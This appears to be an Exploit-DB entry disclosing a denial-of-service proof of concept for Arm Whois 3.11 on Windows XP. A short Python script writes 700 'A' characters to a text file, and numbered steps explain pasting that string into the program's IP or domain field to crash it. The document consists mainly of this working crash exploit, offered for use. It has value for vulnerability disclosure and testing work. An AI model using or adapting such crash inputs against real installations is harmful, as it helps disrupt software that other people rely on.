Arm Whois 3.11 - Denial of Service (PoC)
Author: Yair Rodríguez Aparicio
type: dos
platform: windows_x86
port:
date_added: 2018-11-01
date_updated: 2018-11-01
verified: 0
codes:
tags: Denial of Service (DoS)
aliases:
screenshot_url:
application_url: http://www.exploit-db.comarm-whois(1).exe
# Exploit Title: Arm Whois 3.11 - Denial of Service (PoC)
# Date: 2018-10-31
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: http://www.armcode.com/
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows XP Profesional Español SP3 x86
# Steps to Produce the Crash:
# 1.- Run python code : python whois.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open whois.exe
# 4.- Paste clipboard on "IP address or domain"
# 5.- click on "Retrieves IP-adress info"
# 6.- Crashed!
buffer = "\x41" * 700
f = open("text.txt", "w")
f.write(buffer)
f.close()